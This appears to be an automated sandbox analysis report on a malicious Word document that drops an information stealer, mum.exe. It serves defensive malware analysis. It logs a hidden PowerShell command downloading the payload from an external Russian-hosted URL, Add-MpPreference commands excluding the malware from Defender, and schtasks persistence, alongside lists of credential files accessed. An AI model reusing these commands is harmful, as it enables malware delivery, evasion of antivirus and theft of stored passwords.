          Source: mum.exe, 0000001D.00000002.1049675121.0000000000616000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
          Source: mum.exe, 00000008.00000002.961051196.00000000026CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\6HARDWARE\Description\System"SystemBiosVersion
          Source: mum.exe, 00000008.00000002.961051196.00000000026CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_002C9151 LdrInitializeThunk,15_2_002C9151
          Source: C:\Users\user\AppData\Roaming\mum.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEInjected file: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT was created by C:\Users\user\AppData\Roaming\mum.exeJump to behavior
          Source: C:\Windows\System32\notepad.exeInjected file: C:\Users\user\AppData\Local\Temp\DRdtfhgYgeghDp .scT was created by C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          Source: C:\Windows\System32\notepad.exeInjected file: C:\Users\user\AppData\Local\Temp\DRdtfhgYgeghDp .scT was created by C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          Source: 15.0.mum.exe.400000.0.unpack, u0097?ufffd?t/B?ufffd??.csReference to suspicious API methods: ('?????', 'MapVirtualKey@user32.dll')
          Source: 15.0.mum.exe.400000.0.unpack, ??ufffd??/ufffdufffd??ufffd.csReference to suspicious API methods: ('?????', 'LoadLibrary@kernel32.dll'), ('?????', 'GetProcAddress@kernel32')
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://f0705964.xsph.ru/mum.exe','C:\Users\user\AppData\Roaming\mum.exe')
          Source: C:\Users\user\AppData\Roaming\mum.exeMemory written: C:\Users\user\AppData\Roaming\mum.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeMemory written: C:\Users\user\AppData\Roaming\mum.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeMemory written: C:\Users\user\AppData\Roaming\mum.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RRUwFfPTEDHYrl.exe
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RRUwFfPTEDHYrl.exe
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RRUwFfPTEDHYrl.exe
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RRUwFfPTEDHYrl.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RRUwFfPTEDHYrl.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RRUwFfPTEDHYrl.exe
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\mum.exe C:\Users\user\AppData\Roaming\mum.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RRUwFfPTEDHYrl.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RRUwFfPTEDHYrl" /XML "C:\Users\user\AppData\Local\Temp\tmpEFF.tmpJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess created: C:\Users\user\AppData\Roaming\mum.exe C:\Users\user\AppData\Roaming\mum.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\mum.exe C:\Users\user\AppData\Roaming\mum.exe
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RRUwFfPTEDHYrl.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RRUwFfPTEDHYrl" /XML "C:\Users\user\AppData\Local\Temp\tmp430A.tmpJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess created: C:\Users\user\AppData\Roaming\mum.exe C:\Users\user\AppData\Roaming\mum.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess created: C:\Users\user\AppData\Roaming\mum.exe C:\Users\user\AppData\Roaming\mum.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\mum.exe C:\Users\user\AppData\Roaming\mum.exe
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RRUwFfPTEDHYrl.exe
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RRUwFfPTEDHYrl" /XML "C:\Users\user\AppData\Local\Temp\tmpA5B2.tmp
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess created: C:\Users\user\AppData\Roaming\mum.exe C:\Users\user\AppData\Roaming\mum.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeQueries volume information: C:\Users\user\AppData\Roaming\mum.exe VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeQueries volume information: C:\Users\user\AppData\Roaming\mum.exe VolumeInformationJump to behavior
          Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\AppData\Roaming\mum.exeQueries volume information: C:\Users\user\AppData\Roaming\mum.exe VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\mum.exeQueries volume information: C:\Users\user\AppData\Roaming\mum.exe VolumeInformation
          Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\AppData\Roaming\mum.exeQueries volume information: C:\Users\user\AppData\Roaming\mum.exe VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\mum.exeQueries volume information: C:\Users\user\AppData\Roaming\mum.exe VolumeInformation
          Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DRdtfhgYgeghDp .scT VolumeInformation
          Source: C:\Users\user\AppData\Roaming\mum.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 15.0.mum.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.mum.exe.3859130.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.mum.exe.3878b50.10.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.mum.exe.3878b50.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.mum.exe.3859130.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.mum.exe.3837910.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000F.00000000.953392254.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.972728123.0000000003699000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 15.0.mum.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.mum.exe.3859130.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.mum.exe.3878b50.10.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.mum.exe.3878b50.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.mum.exe.3859130.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.mum.exe.3837910.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000F.00000000.953392254.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.972728123.0000000003699000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: mum.exe PID: 1724, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: mum.exe PID: 2588, type: MEMORYSTR
          Source: C:\Users\user\AppData\Roaming\mum.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
          Source: C:\Users\user\AppData\Roaming\mum.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: C:\Users\user\AppData\Roaming\mum.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
          Source: C:\Users\user\AppData\Roaming\mum.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: C:\Users\user\AppData\Roaming\mum.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
          Source: C:\Users\user\AppData\Roaming\mum.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: Yara matchFile source: 15.0.mum.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.mum.exe.3859130.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.mum.exe.3878b50.10.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.mum.exe.3878b50.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.mum.exe.3859130.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.mum.exe.3837910.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000F.00000000.953392254.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.972728123.0000000003699000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: mum.exe PID: 1724, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: mum.exe PID: 2588, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: mum.exe PID: 1484, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: mum.exe PID: 828, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 15.0.mum.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.mum.exe.3859130.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.mum.exe.3878b50.10.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.mum.exe.3878b50.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.mum.exe.3859130.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.mum.exe.3837910.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000F.00000000.953392254.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.972728123.0000000003699000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 15.0.mum.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.mum.exe.3859130.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.mum.exe.3878b50.10.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.mum.exe.3878b50.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.mum.exe.3859130.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.mum.exe.3837910.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000F.00000000.953392254.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.972728123.0000000003699000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: mum.exe PID: 1724, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: mum.exe PID: 2588, type: MEMORYSTR
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts3
          Scripting
          1
          Scheduled Task/Job
          211
          Process Injection
          21
          Disable or Modify Tools
          2
          OS Credential Dumping
          2
          File and Directory Discovery
          Remote Services11
          Archive Collected Data
          Exfiltration Over Other Network Medium12
          Ingress Tool Transfer
          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default Accounts1
          Native API
          Boot or Logon Initialization Scripts1
          Scheduled Task/Job
          1
          Deobfuscate/Decode Files or Information
          LSASS Memory13
          System Information Discovery
          Remote Desktop Protocol2
          Data from Local System
          Exfiltration Over Bluetooth1
          Encrypted Channel
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain Accounts1
          Shared Modules
          Logon Script (Windows)Logon Script (Windows)3
          Scripting
          Security Account Manager31
          Security Software Discovery
          SMB/Windows Admin Shares1
          Email Collection
          Automated Exfiltration2
          Non-Application Layer Protocol
          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local Accounts33
          Exploitation for Client Execution
          Logon Script (Mac)Logon Script (Mac)3
          Obfuscated Files or Information
          NTDS1
          Process Discovery
          Distributed Component Object ModelInput CaptureScheduled Transfer22
          Application Layer Protocol
          SIM Card SwapCarrier Billing Fraud
          Cloud Accounts1
          Command and Scripting Interpreter
          Network Logon ScriptNetwork Logon Script13
          Software Packing
          LSA Secrets21
          Virtualization/Sandbox Evasion
          SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable Media1
          Scheduled Task/Job
          Rc.commonRc.common1
          Masquerading
          Cached Domain Credentials1
          Remote System Discovery
          VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote Services3
          PowerShell
          Startup ItemsStartup Items21
          Virtualization/Sandbox Evasion
          DCSync1
          System Network Configuration Discovery
          Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job211
          Process Injection
          Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
